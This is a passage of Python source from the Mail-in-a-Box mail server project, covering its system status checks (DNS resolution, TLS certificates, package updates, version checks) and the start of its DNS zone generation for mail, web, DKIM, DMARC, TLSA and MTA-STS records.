env['PUBLIC_IP']), ("AAAA", env.get('PUBLIC_IPV6'))): if not expected: continue # IPv6 is not configured value = query_dns(domain, rtype) if value == normalize_ip(expected): ok_values.append(value) else: output.print_error(f"""This domain should resolve to this box's IP address ({rtype} {expected}) if you would like the box to serve webmail or a website on this domain. The domain currently resolves to {value} in public DNS. It may take several hours for public DNS to update after a change. This problem may result from other issues listed here.""") return # If both A and AAAA are correct... output.print_ok("Domain resolves to this box's IP address. [{} ↦ {}]".format(domain, '; '.join(ok_values))) # We need a TLS certificate for PRIMARY_HOSTNAME because that's where the # user will log in with IMAP or webmail. Any other domain we serve a # website for also needs a signed certificate. check_ssl_cert(domain, rounded_time, ssl_certificates, env, output) def query_dns(qname, rtype, nxdomain='[Not Set]', at=None, as_list=False): # Make the qname absolute by appending a period. Without this, dns.resolver.query # will fall back a failed lookup to a second query with this machine's hostname # appended. This has been causing some false-positive Spamhaus reports. The # reverse DNS lookup will pass a dns.name.Name instance which is already # absolute so we should not modify that. if isinstance(qname, str): qname += "." # Use the default nameservers (as defined by the system, which is our locally # running bind server), or if the 'at' argument is specified, use that host # as the nameserver. resolver = dns.resolver.get_default_resolver() # Make sure at is not a string that cannot be used as a nameserver if at and at not in {'[Not set]', '[timeout]'}: resolver = dns.resolver.Resolver() resolver.nameservers = [at] # Set a timeout so that a non-responsive server doesn't hold us back. resolver.timeout = 5 # The number of seconds to spend trying to get an answer to the question. If the # lifetime expires a dns.exception.Timeout exception will be raised. resolver.lifetime = 5 # Do the query. try: response = resolver.resolve(qname, rtype) except (dns.resolver.NoNameservers, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): # Host did not have an answer for this query; not sure what the # difference is between the two exceptions. return nxdomain except dns.exception.Timeout: return "[timeout]" # Normalize IP addresses. IP address --- especially IPv6 addresses --- can # be expressed in equivalent string forms. Canonicalize the form before # returning them. The caller should normalize any IP addresses the result # of this method is compared with. if rtype in {"A", "AAAA"}: response = [normalize_ip(str(r)) for r in response] if as_list: return response # There may be multiple answers; concatenate the response. Remove trailing # periods from responses since that's how qnames are encoded in DNS but is # confusing for us. The order of the answers doesn't matter, so sort so we # can compare to a well known order. return "; ".join(sorted(str(r).rstrip('.') for r in response)) def check_ssl_cert(domain, rounded_time, ssl_certificates, env, output): # Check that TLS certificate is signed. # Skip the check if the A record is not pointed here. if query_dns(domain, "A", None) not in {env['PUBLIC_IP'], None}: return # Where is the certificate file stored? tls_cert = get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=True) if tls_cert is None: output.print_warning("""No TLS (SSL) certificate is installed for this domain. Visitors to a website on this domain will get a security warning. If you are not serving a website on this domain, you do not need to take any action. Use the TLS Certificates page in the control panel to install a TLS certificate.""") return # Check that the certificate is good. cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"], rounded_time=rounded_time) if cert_status == "OK": # The certificate is ok. The details has expiry info. output.print_ok("TLS (SSL) certificate is signed & valid. " + cert_status_details) elif cert_status == "SELF-SIGNED": # Offer instructions for purchasing a signed certificate. if domain == env['PRIMARY_HOSTNAME']: output.print_error("""The TLS (SSL) certificate for this domain is currently self-signed. You will get a security warning when you check or send email and when visiting this domain in a web browser (for webmail or static site hosting).""") else: output.print_error("""The TLS (SSL) certificate for this domain is self-signed.""") else: output.print_error("The TLS (SSL) certificate has a problem: " + cert_status) if cert_status_details: output.print_line("") output.print_line(cert_status_details) output.print_line("") _apt_updates = None def list_apt_updates(apt_update=True): # See if we have this information cached recently. # Keep the information for 8 hours. global _apt_updates if _apt_updates is not None and _apt_updates[0] > datetime.datetime.now() - datetime.timedelta(hours=8): return _apt_updates[1] # Run apt-get update to refresh package list. This should be running daily # anyway, so on the status checks page don't do this because it is slow. if apt_update: shell("check_call", ["/usr/bin/apt-get", "-qq", "update"]) # Run apt-get upgrade in simulate mode to get a list of what # it would do. simulated_install = shell("check_output", ["/usr/bin/apt-get", "-qq", "-s", "upgrade"]) pkgs = [] for line in simulated_install.split('\n'): if line.strip() == "": continue if re.match(r'^Conf .*', line): # remove these lines, not informative continue m = re.match(r'^Inst (.*) \[(.*)\] \((\S*)', line) if m: pkgs.append({ "package": m.group(1), "version": m.group(3), "current_version": m.group(2) }) else: pkgs.append({ "package": "[" + line + "]", "version": "", "current_version": "" }) # Cache for future requests. _apt_updates = (datetime.datetime.now(), pkgs) return pkgs def what_version_is_this(env): # This function runs `git describe --always --abbrev=0` on the Mail-in-a-Box installation directory. # Git may not be installed and Mail-in-a-Box may not have been cloned from github, # so this function may raise all sorts of exceptions. miab_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) return shell("check_output", ["/usr/bin/git", "describe", "--always", "--abbrev=0"], env={"GIT_DIR": os.path.join(miab_dir, '.git')}).strip() def get_latest_miab_version(): # This pings https://mailinabox.email/setup.sh and extracts the tag named in # the script to determine the current product version. from urllib.request import urlopen, HTTPError, URLError try: return re.search(b'TAG=(.*)', urlopen("https://mailinabox.email/setup.sh?ping=1", timeout=5).read()).group(1).decode("utf8") except (TimeoutError, HTTPError, URLError): return None def check_miab_version(env, output): config = load_settings(env) try: this_ver = what_version_is_this(env) except: this_ver = "Unknown" if config.get("privacy", True): output.print_warning("You are running version Mail-in-a-Box %s. Mail-in-a-Box version check disabled by privacy setting." % this_ver) else: latest_ver = get_latest_miab_version() if this_ver == latest_ver: output.print_ok("Mail-in-a-Box is up to date. You are running version %s." % this_ver) elif latest_ver is None: output.print_error("Latest Mail-in-a-Box version could not be determined. You are running version %s." % this_ver) else: output.print_error(f"A new version of Mail-in-a-Box is available. You are running version {this_ver}. The latest version is {latest_ver}. For upgrade instructions, see https://mailinabox.email. ") def run_and_output_changes(env, pool): import json from difflib import SequenceMatcher out = ConsoleOutput() # Run status checks. cur = BufferedOutput() run_checks(True, env, cur, pool) # Load previously saved status checks. cache_fn = "/var/cache/mailinabox/status_checks.json" if os.path.exists(cache_fn): with open(cache_fn, encoding="utf-8") as f: try: prev = json.load(f) except json.JSONDecodeError: prev = [] # Group the serial output into categories by the headings. def group_by_heading(lines): from collections import OrderedDict ret = OrderedDict() k = [] ret["No Category"] = k for line_type, line_args, line_kwargs in lines: if line_type == "add_heading": k = [] ret[line_args[0]] = k else: k.append((line_type, line_args, line_kwargs)) return ret prev_status = group_by_heading(prev) cur_status = group_by_heading(cur.buf) # Compare the previous to the current status checks # category by category. for category, cur_lines in cur_status.items(): if category not in prev_status: out.add_heading(category + " -- Added") BufferedOutput(with_lines=cur_lines).playback(out) else: # Actual comparison starts here... prev_lines = prev_status[category] def stringify(lines): return [json.dumps(line) for line in lines] diff = SequenceMatcher(None, stringify(prev_lines), stringify(cur_lines)).get_opcodes() for op, i1, i2, j1, j2 in diff: if op == "replace": out.add_heading(category + " -- Previously:") elif op == "delete": out.add_heading(category + " -- Removed") if op in {"replace", "delete"}: BufferedOutput(with_lines=prev_lines[i1:i2]).playback(out) if op == "replace": out.add_heading(category + " -- Currently:") elif op == "insert": out.add_heading(category + " -- Added") if op in {"replace", "insert"}: BufferedOutput(with_lines=cur_lines[j1:j2]).playback(out) for category, prev_lines in prev_status.items(): if category not in cur_status: out.add_heading(category) out.print_warning("This section was removed.") # Store the current status checks output for next time. os.makedirs(os.path.dirname(cache_fn), exist_ok=True) with open(cache_fn, "w", encoding="utf-8") as f: json.dump(cur.buf, f, indent=True) def normalize_ip(ip): # Use ipaddress module to normalize the IPv6 notation and # ensure we are matching IPv6 addresses written in different # representations according to rfc5952. import ipaddress try: return str(ipaddress.ip_address(ip)) except: return ip class FileOutput: def __init__(self, buf, width): self.buf = buf self.width = width def add_heading(self, heading): print(file=self.buf) print(heading, file=self.buf) print("=" * len(heading), file=self.buf) def print_ok(self, message): self.print_block(message, first_line="✓ ") def print_error(self, message): self.print_block(message, first_line="✖ ") def print_warning(self, message): self.print_block(message, first_line="? ") def print_block(self, message, first_line=" "): print(first_line, end='', file=self.buf) message = re.sub("\n\\s*", " ", message) words = re.split(r"(\s+)", message) linelen = 0 for w in words: if self.width and (linelen + len(w) > self.width-1-len(first_line)): print(file=self.buf) print(" ", end="", file=self.buf) linelen = 0 if linelen == 0 and w.strip() == "": continue print(w, end="", file=self.buf) linelen += len(w) print(file=self.buf) def print_line(self, message, monospace=False): for line in message.split("\n"): self.print_block(line) class ConsoleOutput(FileOutput): def __init__(self): self.buf = sys.stdout # Do nice line-wrapping according to the size of the terminal. # The 'stty' program queries standard input for terminal information. if sys.stdin.isatty(): try: self.width = int(shell('check_output', ['stty', 'size']).split()[1]) except: self.width = 76 else: # However if standard input is not a terminal, we would get # "stty: standard input: Inappropriate ioctl for device". So # we test with sys.stdin.isatty first, and if it is not a # terminal don't do any line wrapping. When this script is # run from cron, or if stdin has been redirected, this happens. self.width = None class BufferedOutput: # Record all of the instance method calls so we can play them back later. def __init__(self, with_lines=None): self.buf = with_lines if with_lines else [] def __getattr__(self, attr): if attr not in {"add_heading", "print_ok", "print_error", "print_warning", "print_block", "print_line"}: raise AttributeError # Return a function that just records the call & arguments to our buffer. def w(*args, **kwargs): self.buf.append((attr, args, kwargs)) return w def playback(self, output): for attr, args, kwargs in self.buf: getattr(output, attr)(*args, **kwargs) if __name__ == "__main__": from utils import load_environment env = load_environment() if len(sys.argv) == 1: with multiprocessing.pool.Pool(processes=10) as pool: run_checks(False, env, ConsoleOutput(), pool) elif sys.argv[1] == "--show-changes": with multiprocessing.pool.Pool(processes=10) as pool: run_and_output_changes(env, pool) elif sys.argv[1] == "--check-primary-hostname": # See if the primary hostname appears resolvable and has a signed certificate. domain = env['PRIMARY_HOSTNAME'] if query_dns(domain, "A") != env['PUBLIC_IP']: sys.exit(1) ssl_certificates = get_ssl_certificates(env) tls_cert = get_domain_ssl_files(domain, ssl_certificates, env) if not os.path.exists(tls_cert["certificate"]): sys.exit(1) cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"], warn_if_expiring_soon=False) if cert_status != "OK": sys.exit(1) sys.exit(0) elif sys.argv[1] == "--version": print(what_version_is_this(env)) elif sys.argv[1] == "--only": with multiprocessing.pool.Pool(processes=10) as pool: run_checks(False, env, ConsoleOutput(), pool, domains_to_check=sys.argv[2:]) File: management/dns_update.py #!/usr/local/lib/mailinabox/env/bin/python # Creates DNS zone files for all of the domains of all of the mail users # and mail aliases and restarts nsd. ######################################################################## import sys, os, os.path, datetime, re, hashlib, base64 import ipaddress import rtyaml import dns.resolver from utils import shell, load_env_vars_from_file, safe_domain_name, sort_domains, get_ssh_port from ssl_certificates import get_ssl_certificates, check_certificate import contextlib # From https://stackoverflow.com/questions/3026957/how-to-validate-a-domain-name-using-regex-php/16491074#16491074 # This regular expression matches domain names according to RFCs, it also accepts fqdn with an leading dot, # underscores, as well as asterisks which are allowed in domain names but not hostnames (i.e. allowed in # DNS but not in URLs), which are common in certain record types like for DKIM. DOMAIN_RE = r"^(?!\-)(?:[*][.])?(?:[a-zA-Z\d\-_]{0,62}[a-zA-Z\d_]\.){1,126}(?!\d+)[a-zA-Z\d_]{1,63}(\.?)$" def get_dns_domains(env): # Add all domain names in use by email users and mail aliases, any # domains we serve web for (except www redirects because that would # lead to infinite recursion here) and ensure PRIMARY_HOSTNAME is in the list. from mailconfig import get_mail_domains from web_update import get_web_domains domains = set() domains |= set(get_mail_domains(env)) domains |= set(get_web_domains(env, include_www_redirects=False)) domains.add(env['PRIMARY_HOSTNAME']) return domains def get_dns_zones(env): # What domains should we create DNS zones for? Never create a zone for # a domain & a subdomain of that domain. domains = get_dns_domains(env) # Exclude domains that are subdomains of other domains we know. Proceed # by looking at shorter domains first. zone_domains = set() for domain in sorted(domains, key=len): for d in zone_domains: if domain.endswith("." + d): # We found a parent domain already in the list. break else: # 'break' did not occur: there is no parent domain. zone_domains.add(domain) # Make a nice and safe filename for each domain. zonefiles = [[domain, safe_domain_name(domain) + ".txt"] for domain in zone_domains] # Sort the list so that the order is nice and so that nsd.conf has a # stable order so we don't rewrite the file & restart the service # meaninglessly. zone_order = sort_domains([ zone[0] for zone in zonefiles ], env) zonefiles.sort(key = lambda zone : zone_order.index(zone[0]) ) return zonefiles def do_dns_update(env, force=False): # Write zone files. os.makedirs('/etc/nsd/zones', exist_ok=True) zonefiles = [] updated_domains = [] for (domain, zonefile, records) in build_zones(env): # The final set of files will be signed. zonefiles.append((domain, zonefile + ".signed")) # See if the zone has changed, and if so update the serial number # and write the zone file. if not write_nsd_zone(domain, "/etc/nsd/zones/" + zonefile, records, env, force): # Zone was not updated. There were no changes. continue # Mark that we just updated this domain. updated_domains.append(domain) # Sign the zone. # # Every time we sign the zone we get a new result, which means # we can't sign a zone without bumping the zone's serial number. # Thus we only sign a zone if write_nsd_zone returned True # indicating the zone changed, and thus it got a new serial number. # write_nsd_zone is smart enough to check if a zone's signature # is nearing expiration and if so it'll bump the serial number # and return True so we get a chance to re-sign it. sign_zone(domain, zonefile, env) # Write the main nsd.conf file. if write_nsd_conf(zonefiles, list(get_custom_dns_config(env)), env): # Make sure updated_domains contains *something* if we wrote an updated # nsd.conf so that we know to restart nsd. if len(updated_domains) == 0: updated_domains.append("DNS configuration") # Tell nsd to reload changed zone files. if len(updated_domains) > 0: # 'reconfig' is needed if there are added or removed zones, but # it may not reload existing zones, so we call 'reload' too. If # nsd isn't running, nsd-control fails, so in that case revert # to restarting nsd to make sure it is running. Restarting nsd # should also refresh everything. try: shell('check_call', ["/usr/sbin/nsd-control", "reconfig"]) shell('check_call', ["/usr/sbin/nsd-control", "reload"]) except: shell('check_call', ["/usr/sbin/service", "nsd", "restart"]) # Write the OpenDKIM configuration tables for all of the mail domains. from mailconfig import get_mail_domains if write_opendkim_tables(get_mail_domains(env), env): # Settings changed. Kick opendkim. shell('check_call', ["/usr/sbin/service", "opendkim", "restart"]) if len(updated_domains) == 0: # If this is the only thing that changed? updated_domains.append("OpenDKIM configuration") # Clear bind9's DNS cache so our own DNS resolver is up to date. # (ignore errors with trap=True) shell('check_call', ["/usr/sbin/rndc", "flush"], trap=True) if len(updated_domains) == 0: # if nothing was updated (except maybe OpenDKIM's files), don't show any output return "" else: return "updated DNS: " + ",".join(updated_domains) + "\n" ######################################################################## def build_zones(env): # What domains (and their zone filenames) should we build? domains = get_dns_domains(env) zonefiles = get_dns_zones(env) # Create a dictionary of domains to a set of attributes for each # domain, such as whether there are mail users at the domain. from mailconfig import get_mail_domains from web_update import get_web_domains mail_domains = set(get_mail_domains(env)) mail_user_domains = set(get_mail_domains(env, users_only=True)) # i.e. will log in for mail, Nextcloud web_domains = set(get_web_domains(env)) auto_domains = web_domains - set(get_web_domains(env, include_auto=False)) domains |= auto_domains # www redirects not included in the initial list, see above # Add ns1/ns2+PRIMARY_HOSTNAME which must also have A/AAAA records # when the box is acting as authoritative DNS server for its domains. for ns in ("ns1", "ns2"): d = ns + "." + env["PRIMARY_HOSTNAME"] domains.add(d) auto_domains.add(d) domains = { domain: { "user": domain in mail_user_domains, "mail": domain in mail_domains, "web": domain in web_domains, "auto": domain in auto_domains, } for domain in domains } # For MTA-STS, we'll need to check if the PRIMARY_HOSTNAME certificate is # singned and valid. Check that now rather than repeatedly for each domain. domains[env["PRIMARY_HOSTNAME"]]["certificate-is-valid"] = is_domain_cert_signed_and_valid(env["PRIMARY_HOSTNAME"], env) # Load custom records to add to zones. additional_records = list(get_custom_dns_config(env)) # Build DNS records for each zone. for domain, zonefile in zonefiles: # Build the records to put in the zone. records = build_zone(domain, domains, additional_records, env) yield (domain, zonefile, records) def build_zone(domain, domain_properties, additional_records, env, is_zone=True): records = [] # For top-level zones, define the authoritative name servers. # # Normally we are our own nameservers. Some TLDs require two distinct IP addresses, # so we allow the user to override the second nameserver definition so that # secondary DNS can be set up elsewhere. # # 'False' in the tuple indicates these records would not be used if the zone # is managed outside of the box. if is_zone: # Obligatory NS record to ns1.PRIMARY_HOSTNAME. records.append((None, "NS", "ns1.%s." % env["PRIMARY_HOSTNAME"], False)) # NS record to ns2.PRIMARY_HOSTNAME or whatever the user overrides. # User may provide one or more additional nameservers secondary_ns_list = get_secondary_dns(additional_records, mode="NS") \ or ["ns2." + env["PRIMARY_HOSTNAME"]] records.extend((None, "NS", secondary_ns+'.', False) for secondary_ns in secondary_ns_list) # In PRIMARY_HOSTNAME... if domain == env["PRIMARY_HOSTNAME"]: # Set the A/AAAA records. Do this early for the PRIMARY_HOSTNAME so that the user cannot override them # and we can provide different explanatory text. records.append((None, "A", env["PUBLIC_IP"], "Required. Sets the IP address of the box.")) if env.get("PUBLIC_IPV6"): records.append((None, "AAAA", env["PUBLIC_IPV6"], "Required. Sets the IPv6 address of the box.")) # Add a DANE TLSA record for SMTP. records.append(("_25._tcp", "TLSA", build_tlsa_record(env), "Recommended when DNSSEC is enabled. Advertises to mail servers connecting to the box that mandatory encryption should be used.")) # Add a DANE TLSA record for HTTPS, which some browser extensions might make use of. records.append(("_443._tcp", "TLSA", build_tlsa_record(env), "Optional. When DNSSEC is enabled, provides out-of-band HTTPS certificate validation for a few web clients that support it.")) # Add a SSHFP records to help SSH key validation. One per available SSH key on this system. records.extend((None, "SSHFP", value, "Optional. Provides an out-of-band method for verifying an SSH key before connecting. Use 'VerifyHostKeyDNS yes' (or 'VerifyHostKeyDNS ask') when connecting with ssh.") for value in build_sshfp_records()) # Add DNS records for any subdomains of this domain. We should not have a zone for # both a domain and one of its subdomains. if is_zone: # don't recurse when we're just loading data for a subdomain subdomains = [d for d in domain_properties if d.endswith("." + domain)] for subdomain in subdomains: subdomain_qname = subdomain[0:-len("." + domain)] subzone = build_zone(subdomain, domain_properties, additional_records, env, is_zone=False) for child_qname, child_rtype, child_value, child_explanation in subzone: if child_qname is None: child_qname = subdomain_qname else: child_qname += "." + subdomain_qname records.append((child_qname, child_rtype, child_value, child_explanation)) has_rec_base = list(records) # clone current state def has_rec(qname, rtype, prefix=None): return any(rec[0] == qname and rec[1] == rtype and (prefix is None or rec[2].startswith(prefix)) for rec in has_rec_base) # The user may set other records that don't conflict with our settings. # Don't put any TXT records above this line, or it'll prevent any custom TXT records. for qname, rtype, value in filter_custom_records(domain, additional_records): # Don't allow custom records for record types that override anything above. # But allow multiple custom records for the same rtype --- see how has_rec_base is used. if has_rec(qname, rtype): continue # The "local" keyword on A/AAAA records are short-hand for our own IP. # This also flags for web configuration that the user wants a website here. if rtype == "A" and value == "local": value = env["PUBLIC_IP"] if rtype == "AAAA" and value == "local": if "PUBLIC_IPV6" in env: value = env["PUBLIC_IPV6"] else: continue records.append((qname, rtype, value, "(Set by user.)")) # Add A/AAAA defaults if not overridden by the user's custom settings (and not otherwise configured). # Any CNAME or A record on the qname overrides A and AAAA. But when we set the default A record, # we should not cause the default AAAA record to be skipped because it thinks a custom A record # was set. So set has_rec_base to a clone of the current set of DNS settings, and don't update # during this process. has_rec_base = list(records) a_expl = "Required. May have a different value. Sets the IP address that %s resolves to for web hosting and other services besides mail. The A record must be present but its value does not affect mail delivery." % domain if domain_properties[domain]["auto"]: if domain.startswith(("ns1.", "ns2.")): a_expl = False # omit from 'External DNS' page since this only applies if box is its own DNS server if domain.startswith("www."): a_expl = "Optional. Sets the IP address that %s resolves to so that the box can provide a redirect to the parent domain." % domain if domain.startswith("mta-sts."): a_expl = "Optional. MTA-STS Policy Host serving /.well-known/mta-sts.txt." if domain.startswith("autoconfig."): a_expl = "Provides email configuration autodiscovery support for Thunderbird Autoconfig." if domain.startswith("autodiscover."): a_expl = "Provides email configuration autodiscovery support for Z-Push ActiveSync Autodiscover." defaults = [ (None, "A", env["PUBLIC_IP"], a_expl), (None, "AAAA", env.get('PUBLIC_IPV6'), "Optional. Sets the IPv6 address that %s resolves to, e.g. for web hosting. (It is not necessary for receiving mail on this domain.)" % domain), ] for qname, rtype, value, explanation in defaults: if value is None or value.strip() == "": continue # skip IPV6 if not set if not is_zone and qname == "www": continue # don't create any default 'www' subdomains on what are themselves subdomains # Set the default record, but not if: # (1) there is not a user-set record of the same type already # (2) there is not a CNAME record already, since you can't set both and who knows what takes precedence # (2) there is not an A record already (if this is an A record this is a dup of (1), and if this is an AAAA record then don't set a default AAAA record if the user sets a custom A record, since the default wouldn't make sense and it should not resolve if the user doesn't provide a new AAAA record) if not has_rec(qname, rtype) and not has_rec(qname, "CNAME") and not has_rec(qname, "A"): records.append((qname, rtype, value, explanation)) # Don't pin the list of records that has_rec checks against anymore. has_rec_base = records if domain_properties[domain]["mail"]: # The MX record says where email for the domain should be delivered: Here! if not has_rec(None, "MX", prefix="10 "): records.append((None, "MX", "10 %s." % env["PRIMARY_HOSTNAME"], "Required. Specifies the hostname (and priority) of the machine that handles @%s mail." % domain)) # SPF record: Permit the box ('mx', see above) to send mail on behalf of # the domain, and no one else. # Skip if the user has set a custom SPF record. if not has_rec(None, "TXT", prefix="v=spf1 "): records.append((None, "TXT", 'v=spf1 mx -all', "Recommended. Specifies that only the box is permitted to send @%s mail." % domain)) # Append the DKIM TXT record to the zone as generated by OpenDKIM. # Skip if the user has set a DKIM record already. opendkim_record_file = os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.txt') with open(opendkim_record_file, encoding="utf-8") as orf: m = re.match(r'(\S+)\s+IN\s+TXT\s+\( ((?:"[^"]+"\s+)+)\)', orf.read(), re.S) val = "".join(re.findall(r'"([^"]+)"', m.group(2))) if not has_rec(m.group(1), "TXT", prefix="v=DKIM1; "): records.append((m.group(1), "TXT", val, "Recommended. Provides a way for recipients to verify that this machine sent @%s mail." % domain)) # Append a DMARC record. # Skip if the user has set a DMARC record already. if not has_rec("_dmarc", "TXT", prefix="v=DMARC1; "): records.append(("_dmarc", "TXT", 'v=DMARC1; p=quarantine;', "Recommended. Specifies that mail that does not originate from the box but claims to be from @%s or which does not have a valid DKIM signature is suspect and should be quarantined by the recipient's mail system." % domain)) if domain_properties[domain]["user"]: # Add CardDAV/CalDAV SRV records on the non-primary hostname that points to the primary hostname # for autoconfiguration of mail clients (so only domains hosting user accounts need it). # The SRV record format is priority (0, whatever), weight (0, whatever), port, service provider hostname (w/ trailing dot). if domain != env["PRIMARY_HOSTNAME"]: for dav in ("card", "cal"): qname = "_" + dav + "davs._tcp" if not has_rec(qname, "SRV"): records.append((qname, "SRV", "0 0 443 " + env["PRIMARY_HOSTNAME"] + ".", "Recommended. Specifies the hostname of the server that handles CardDAV/CalDAV services for email addresses on this domain.")) # If this is a domain name that there are email addresses configured for, i.e. "something@" # this domain name, then the domain name is a MTA-STS (https://tools.ietf.org/html/rfc8461) # Policy Domain. # # A "_mta-sts" TXT record signals the presence of a MTA-STS policy. The id field helps clients # cache the policy. It should be stable so we don't update DNS unnecessarily but change when # the policy changes. It must be at most 32 letters and numbers, so we compute a hash of the # policy file. # # The policy itself is served at the "mta-sts" (no underscore) subdomain over HTTPS. Therefore # the TLS certificate used by Postfix for STARTTLS must be a valid certificate for the MX # domain name (PRIMARY_HOSTNAME) *and* the TLS certificate used by nginx for HTTPS on the mta-sts # subdomain must be valid certificate for that domain. Do not set an MTA-STS policy if either # certificate in use is not valid (e.g. because it is self-signed and a valid certificate has not # yet been provisioned). Since we cannot provision a certificate without A/AAAA records, we # always set them (by including them in the www domains) --- only the TXT records depend on there # being valid certificates. mta_sts_records = [ ] if domain_properties[domain]["mail"] \ and domain_properties[env["PRIMARY_HOSTNAME"]]["certificate-is-valid"] \ and is_domain_cert_signed_and_valid("mta-sts." + domain, env): # Compute an up-to-32-character hash of the policy file. We'll take a SHA-1 hash of the policy # file (20 bytes) and encode it as base-64 (28 bytes, using alphanumeric alternate characters # instead of '+' and '/' which are not allowed in an MTA-STS policy id) but then just take its # first 20 characters, which is more than sufficient to change whenever the policy file changes # (and ensures any '=' padding at the end of the base64 encoding is dropped). with open("/var/lib/mailinabox/mta-sts.txt", "rb") as f: mta_sts_policy_id = base64.b64encode(hashlib.sha1(f.read()).digest(), altchars=b"AA").decode("ascii")[0:20] mta_sts_records.extend([ ("_mta-sts", "TXT", "v=STSv1; id=" + mta_sts_policy_id, "Optional. Part of the MTA-STS policy for incoming mail. If set, a MTA-STS policy must also be published.") ]) # Enable SMTP TLS reporting (https://tools.ietf.org/html/rfc8460) if the user has set a config option. # Skip if the rules below if the user has set a custom _smtp._tls record. if env.get("MTA_STS_TLSRPT_RUA") and not has_rec("_smtp._tls", "TXT", prefix="v=TLSRPTv1;"): mta_sts_records.append(("_smtp._tls", "TXT", "v=TLSRPTv1; rua=" + env["MTA_STS_TLSRPT_RUA"], "Optional. Enables MTA-STS reporting.")) for qname, rtype, value, explanation in mta_sts_records: if not has_rec(qname, rtype): records.append((qname, rtype, value, explanation)) # Add no-mail-here records for any qname that has an A or AAAA record # but no MX record. This would include domain itself if domain is a # non-mail domain and also may include qnames from custom DNS records. # Do this once at the end of generating a zone. if is_zone: qnames_with_a = {qname for (qname, rtype, value, explanation) in records if rtype in {"A", "AAAA"}} qnames_with_mx = {qname for (qname, rtype, value, explanation) in records if rtype == "MX"} for qname in qnames_with_a - qnames_with_mx: # Mark this domain as not sending mail with hard-fail SPF and DMARC records. d = (qname+"." if qname else "") + domain if not has_rec(qname, "TXT", prefix="v=spf1 "): records.append((qname, "TXT", 'v=spf1 -all', "Recommended. Prevents use of this domain name for outbound mail by specifying that no servers are valid sources for mail from @%s. If you do send email from this domain name you should either override this record such that the SPF rule does allow the originating server, or, take the recommended approach and have the box handle mail for this domain (simply add any receiving alias at this domain name to make this machine treat the domain name as one of its mail domains)." % d)) if not has_rec("_dmarc" + ("."+qname if qname else ""), "TXT", prefix="v=DMARC1; "): records.append(("_dmarc" + ("."+qname if qname else ""), "TXT", 'v=DMARC1; p=reject;', "Recommended. Prevents use of this domain name for outbound mail by specifying that the SPF rule should be honoured for mail from @%s." % d)) # And with a null MX record (https://explained-from-first-principles.com/email/#null-mx-record) if not has_rec(qname, "MX"): records.append((qname, "MX", '0 .', "Recommended. Prevents use of this domain name for incoming mail.")) # Sort the records. The None records *must* go first in the nsd zone file. Otherwise it doesn't matter. records.sort(key = lambda rec : list(reversed(rec[0].split(".")) if rec[0] is not None else "")) return records def is_domain_cert_signed_and_valid(domain, env): cert = get_ssl_certificates(env).get(domain) if not cert: return False # no certificate provisioned cert_status = check_certificate(domain, cert['certificate'], cert['private-key']) return cert_status[0] == 'OK' ######################################################################## def build_tlsa_record(env): # A DANE TLSA record in DNS specifies that connections on a port # must use TLS and the certificate must match a particular criteria. # # Thanks to http://blog.huque.com/2012/10/dnssec-and-certificates.html # and https://community.letsencrypt.org/t/please-avoid-3-0-1-and-3-0-2-dane-tlsa-records-with-le-certificates/7022 # for explaining all of this! Also see https://tools.ietf.org/html/rfc6698#section-2.1 # and https://github.com/mail-in-a-box/mailinabox/issues/268#issuecomment-167160243. # # There are several criteria. We used to use "3 0 1" criteria, which # meant to pin a leaf (3) certificate (0) with SHA256 hash (1). But # certificates change, and especially as we move to short-lived certs # they change often. The TLSA record handily supports the criteria of # a leaf certificate (3)'s subject public key (1) with SHA256 hash (1). # The subject public key is the public key portion of the private key # that generated the CSR that generated the certificate. Since we # generate a private key once the first time Mail-in-a-Box is set up # and reuse it for all subsequent certificates, the TLSA record will # remain valid indefinitely. from ssl_certificates import load_cert_chain, load_pem from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat fn = os.path.join(env["STORAGE_ROOT"], "ssl", "ssl_certificate.pem") cert = load_pem(load_cert_chain(fn)[0]) subject_public_key = cert.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo) # We could have also loaded ssl_private_key.pem and called priv_key.public_key().public_bytes(...) pk_hash = hashlib.sha256(subject_public_key).hexdigest() # Specify the TLSA parameters: # 3: Match the (leaf) certificate. (No CA, no trust path needed.) # 1: Match its subject public key. # 1: Use SHA256. return "3 1 1 " + pk_hash def build_sshfp_records(): # The SSHFP record is a way for us to embed this server's SSH public # key fingerprint into the DNS so that remote hosts have an out-of-band # method to confirm the fingerprint. See RFC 4255 and RFC 6594. This # depends on DNSSEC. # # On the client side, set SSH's VerifyHostKeyDNS option to 'ask' to # include this info in the key verification prompt or 'yes' to trust # the SSHFP record. # # See https://github.com/xelerance/sshfp for inspiriation. algorithm_number = { "ssh-rsa": 1, "ssh-dss": 2, "ecdsa-sha2-nistp256": 3, "ssh-ed25519": 4, } # Get our local fingerprints by running ssh-keyscan. The output looks # like the known_hosts file: hostname, keytype, fingerprint. The order # of the output is arbitrary, so sort it to prevent spurious updates # to the zone file (that trigger bumping the serial number). However, # if SSH has been configured to listen on a nonstandard port, we must # specify that port to sshkeyscan. port = get_ssh_port() # If nothing returned, SSH is probably not installed. if not port: return keys = shell("check_output", ["ssh-keyscan", "-4", "-t", "rsa,dsa,ecdsa,ed25519", "-p", str(port), "localhost"]) keys = sorted(keys.split("\n")) for key in keys: if key.strip() == "" or key[0] == "#": continue try: _host, keytype, pubkey = key.split(" ") yield "%d %d ( %s )" % ( algorithm_number[keytype], 2, # specifies we are using SHA-256 on next line hashlib.sha256(base64.b64decode(pubkey)).hexdigest().upper(), ) except: # Lots of things can go wrong. Don't let it disturb the DNS # zone. pass ######################################################################## def write_nsd_zone(domain, zonefile, records, env, force): # On the $ORIGIN line, there's typically a ';' comment at the end explaining # what the $ORIGIN line does. Any further data after the domain confuses # ldns-signzone, however. It used to say '; default zone domain'. # # The SOA contact address for all of the domains on this system is hostmaster # @ the PRIMARY_HOSTNAME. Hopefully that's legit. # # For the refresh through TTL fields, a good reference is: # https://www.ripe.net/publications/docs/ripe-203 # # A hash of the available DNSSEC keys are added in a comment so that when # the keys change we force a re-generation of the zone which triggers # re-signing it. zone = """ $ORIGIN {domain}. $TTL 86400 ; default time to live @ IN SOA ns1.{primary_domain}. hostmaster.{primary_domain}. ( __SERIAL__ ; serial number 7200 ; 